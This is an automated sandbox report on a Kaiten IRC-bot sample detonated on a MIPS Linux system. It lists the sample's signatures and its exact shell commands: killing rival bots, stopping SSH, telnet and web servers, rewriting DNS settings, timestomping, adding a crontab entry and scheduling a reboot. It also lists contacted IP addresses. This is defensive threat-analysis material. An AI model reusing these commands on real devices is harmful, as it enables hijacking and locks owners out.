Malware Analysis Report

2024-11-13 17:34

Sample ID 220415-bg3e3sagd9
Target 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
SHA256 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Tags
kaiten persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848

Threat Level: Known bad

The file 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 was found to be: Known bad.

Malicious Activity Summary

kaiten persistence

Kaiten family

Identified Kaiten Bot

Writes file to system bin folder

Writes DNS configuration

Modifies init.d

Write file to user bin folder

Modifies rc script

Reads runtime system information

Writes file to tmp directory

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-15 01:07

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-15 01:07

Reported

2022-04-15 01:39

Platform

debian9-mipsel-en-20211208

Max time kernel

0s

Max time network

120s

Command Line

[./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

Signatures

Writes DNS configuration

Description Indicator Process Target
/etc/resolv.conf /etc/resolv.conf N/A N/A

Modifies init.d

persistence
Description Indicator Process Target
/etc/init.d/rcS /etc/init.d/rcS ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A

Modifies rc script

persistence
Description Indicator Process Target
/etc/rc.d/rc.local /etc/rc.d/rc.local ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A

Write file to user bin folder

Description Indicator Process Target
/usr/sbin/nvram /usr/sbin/nvram ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/usr/bin/compile_time /usr/bin/compile_time ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/usr/bin/crontab /usr/bin/crontab ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/usr/sbin/service /usr/sbin/service /usr/sbin/service N/A
/usr/sbin/service /usr/sbin/service /usr/sbin/service N/A
/usr/sbin/service /usr/sbin/service /usr/sbin/service N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/321/cmdline /proc/321/cmdline ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/tty3 /tmp/tty3 /bin/rm N/A
/tmp/tty4 /tmp/tty4 /bin/rm N/A
/tmp/tty6 /tmp/tty6 /bin/rm N/A
/tmp/.xs /tmp/.xs N/A N/A
/tmp/.xs/*.pid /tmp/.xs/*.pid /bin/cat N/A
/tmp/toexec /tmp/toexec ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/tmp/tty1 /tmp/tty1 /bin/rm N/A
/tmp/tty2 /tmp/tty2 /bin/rm N/A
/tmp/tty5 /tmp/tty5 /bin/rm N/A
/tmp/.xs/* /tmp/.xs/* /bin/rm N/A

Processes

./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848

[./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/bin/sh

[sh -c rm -rf /var/run/wgsh > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/wgsh]

/bin/sh

[sh -c rm -rf /var/run/bbsh > /dev/null 2>&1 &]

/bin/sh

[sh -c rm -rf /var/run/tty1 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/bbsh]

/bin/sh

[sh -c rm -rf /var/run/tty2 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty1]

/bin/sh

[sh -c rm -rf /var/run/tty3 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty2]

/bin/sh

[sh -c rm -rf /var/run/tty4 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty3]

/bin/sh

[sh -c rm -rf /var/run/tty5 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty4]

/bin/sh

[sh -c rm -rf /var/run/tty6 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty5]

/bin/sh

[sh -c rm -rf /tmp/tty1 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty6]

/bin/sh

[sh -c rm -rf /tmp/tty2 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty1]

/bin/sh

[sh -c rm -rf /tmp/tty3 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty2]

/bin/sh

[sh -c rm -rf /tmp/tty4 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty3]

/bin/sh

[sh -c rm -rf /tmp/tty5 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty4]

/bin/sh

[sh -c rm -rf /tmp/tty6 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty5]

/bin/sh

[sh -c rm -rf /var/run/pty > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty6]

/bin/sh

[sh -c killall -9 arm > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/pty]

/bin/sh

[sh -c killall -9 mips > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 mipsel > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 powerpc > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 ppc > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.armv4l.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.i686.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.mips.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.mipsel.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &]

/bin/sh

[sh -c rm -rf /tmp/.xs/* > /dev/null 2>&1 &]

/bin/cat

[cat /tmp/.xs/*.pid]

/bin/sh

[sh -c sleep 432000 && reboot &]

/bin/rm

[rm -rf /tmp/.xs/*]

/bin/sh

[sh -c echo "nameserver 8.8.8.8" > /etc/resolv.conf &]

/bin/sleep

[sleep 432000]

/bin/sh

[sh -c chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &]

/bin/sh

[sh -c touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/bin/chmod

[chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/bin/sh

[sh -c (crontab -l | grep -v "/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x001804289383) > /dev/null 2>&1]

/bin/grep

[grep -v no cron]

/bin/grep

[grep -v /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v lesshts/run.sh]

/bin/sh

[sh -c echo "* * * * * /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &" >> /var/run/.x001804289383]

/bin/sh

[sh -c crontab /var/run/.x001804289383]

/usr/bin/crontab

[crontab /var/run/.x001804289383]

/bin/sh

[sh -c rm -rf /var/run/.x001804289383]

/bin/rm

[rm -rf /var/run/.x001804289383]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &]

/bin/sh

[sh -c service httpd stop > /dev/null 2>&1 &]

/bin/cat

[cat /var/run/httpd.pid]

/bin/sh

[sh -c killall -9 mini_httpd > /dev/null 2>&1 &]

/usr/sbin/service

[service httpd stop]

/bin/sh

[sh -c killall -9 minihttpd > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c nvram set httpd_enable=0 > /dev/null 2>&1]

/bin/cat

[cat /var/run/thttpd.pid]

/bin/sh

[sh -c nvram set http_enable=0 > /dev/null 2>&1]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 httpd > /dev/null 2>&1 &]

/bin/sh

[sh -c service telnetd stop > /dev/null 2>&1 &]

/bin/sh

[sh -c service sshd stop > /dev/null 2>&1 &]

/usr/sbin/service

[service telnetd stop]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sh

[sh -c killall -9 telnetd > /dev/null 2>&1 &]

/usr/sbin/service

[service sshd stop]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 utelnetd > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 dropbear > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 sshd > /dev/null 2>&1 &]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 lighttpd > /dev/null 2>&1 &]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl stop httpd.service]

/usr/local/bin/systemctl

[systemctl stop httpd.service]

/usr/sbin/systemctl

[systemctl stop httpd.service]

/usr/bin/systemctl

[systemctl stop httpd.service]

/sbin/systemctl

[systemctl stop httpd.service]

/bin/systemctl

[systemctl stop httpd.service]

/usr/local/sbin/systemctl

[systemctl stop telnetd.service]

/usr/local/bin/systemctl

[systemctl stop telnetd.service]

/usr/sbin/systemctl

[systemctl stop telnetd.service]

/usr/bin/systemctl

[systemctl stop telnetd.service]

/sbin/systemctl

[systemctl stop telnetd.service]

/bin/systemctl

[systemctl stop telnetd.service]

/usr/local/sbin/systemctl

[systemctl stop sshd.service]

/usr/local/bin/systemctl

[systemctl stop sshd.service]

/usr/sbin/systemctl

[systemctl stop sshd.service]

/usr/bin/systemctl

[systemctl stop sshd.service]

/sbin/systemctl

[systemctl stop sshd.service]

/bin/systemctl

[systemctl stop sshd.service]

Network

Country Destination Domain Proto
PE 191.98.172.42:8080 tcp
CN 211.103.199.94:8080 tcp
TH 202.28.32.30:8080 tcp
ID 103.3.46.2:8080 tcp
RU 195.70.197.29:8080 tcp

Files

N/A